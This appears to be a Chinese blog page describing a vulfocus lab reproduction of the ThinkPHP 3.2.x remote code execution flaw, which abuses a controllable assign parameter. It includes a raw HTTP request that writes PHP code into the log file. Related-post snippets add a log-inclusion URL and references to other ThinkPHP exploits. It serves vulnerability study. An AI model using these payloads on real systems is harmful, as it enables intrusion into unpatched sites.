vulfocus——thinkphp3.2.x代码执行

最新推荐文章于 2024-09-26 13:53:30 发布
原创 最新推荐文章于 2024-09-26 13:53:30 发布 · 2.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

此文章详细介绍了ThinkPHP 3.2版本中存在的远程代码执行漏洞,通过恶意构造请求参数,攻击者可以利用此漏洞实现任意代码执行。文中提供了具体的复现步骤及数据包示例。

描述

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。 

复现

1.在默认的日志路径中包含执行PHP代码,数据包如下:

GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1

</
最低0.47元/天 解锁文章
thinkphp3.2.x 代码执行
qq_23003811的博客
07-15 785
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。1、构造payload:/index.php?
ThinkPHP3.2.x SQL注入
LYJ20010728的博客
08-03 1693
ThinkPHP3.x SQL注入初始配置数据库配置where注入控制器配置exp注入控制器配置bind注入控制器配置漏洞利用where注入exp注入bind注入漏洞分析where注入exp注入bind注入参考文章 初始配置 这里利用ThinkPHP3.2.3做示例,戳此进行下载 ThinkPHP中的常用方法汇总总结:M方法,D方法,U方法,I方法 数据库配置 数据库相关内容配置,文件位置Application/Home/Conf/config.php <?php return arr
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2682
thinkphp-命令执行】日志包含
Vulfocus通关---thinkphp3.2.x 代码执行
RanQ的博客
09-15 836
vulfocus的tp漏洞通关小白手把手教程
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
精选资源
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
1. MVC模式:ThinkPHP3.2采用模型-视图-控制器架构,将业务逻辑、数据处理和界面展示分离,使代码更加清晰,易于维护。 2. 快速路由:强大的路由系统使得URL管理更加灵活,支持动态路由和RESTful风格的API设计。 3. ...
[vulfocus] thinkphp3.2.x 代码执行
最新发布
weixin_45686785的博客
09-26 292
其中,24_09_26改成相对应的日期。访问给的IP,抓包重放。
ThinkPHP3.2项目源码(包含数据库)
11-21
一个使用ThinkPHP3.2的项目实例,供新人学习使用,请勿商用.
vulfocus thinkphp-3.2.x
A1bewhy的博客
03-23 4299
readme 1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com) 2.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日) 3、重开了几次环境,所以截图混乱,但是步骤和方法可行 4、如果解题过程1不可行,可尝试解题过程2 解题过程1 1、访问网址,抓包,改数据包 2、访问\Application\Runtime\Logs\Common\yy_mm_dd.log(其中,yy为年,mm为月,dd为日) 3、构造请求攻击 htt
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 2096
vulfocus靶场
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1388
thinkphp3.2.3 代码执行
ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链
LYJ20010728的博客
08-10 1005
ThinkPHP3.2.x(SQL注入&文件读取)反序列化POP链初始配置漏洞利用漏洞分析POP链分析POP链构造漏洞利用参考文章 初始配置 这里利用ThinkPHP3.2.3做示例,戳此进行下载 php的版本采用PHP5 (PHP7下起的ThinkPHP框架在调用有参函数时不传参数会触发框架里的错误处理) 下载后的源码中,需要对Application/Home/Controller/IndexController.class.php内容进行修改 <?php namespace Hom
ThinkPHP3.2.x RCE
LYJ20010728的博客
08-03 1257
ThinkPHP3.2.x RCE下载地址漏洞利用代码分析 下载地址 戳此进行下载 漏洞利用 debug模式开启 代码分析 程序执行流程 5
thinkphp 命令行执行
xiaopzi的博客
01-16 1848
echo $PATH/root/perl5/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin这里/usr/local/bin优先于/usr/bin。上面的意思是,linux执行任何命令,都会先去/usr/local/sbin,如果没有再去/usr/local/bin下面,如果还没有就去/usr/local/bin,以此类推,如果都没有,就会提示找不到命令。/usr/bin存放一些用户命令,如led(控制LED灯的)。
远程代码执行--ThinkPHP
weixin_44940180的博客
08-20 476
漏洞 漏洞原因是由于框架对控制器名没有进行足够的校验 导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令 受影响的版本包括5.0和5.1版本。 漏洞影响范围 Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23 漏洞复现 通过phpinfo函数写出phpinfo()的信息 http://localhost/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction
ThinkPHP 3.2.x RCE漏洞复现
qq_43697234的博客
07-20 8627
ThinkPHP 3.2.x RCE漏洞复现 漏洞介绍 ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。 漏洞复现 复现环境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建环境: 在ThinkPHP的Application\Home\Controller\IndexController.class.php 目录
thinkphp3.2.x rce
12-18
这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值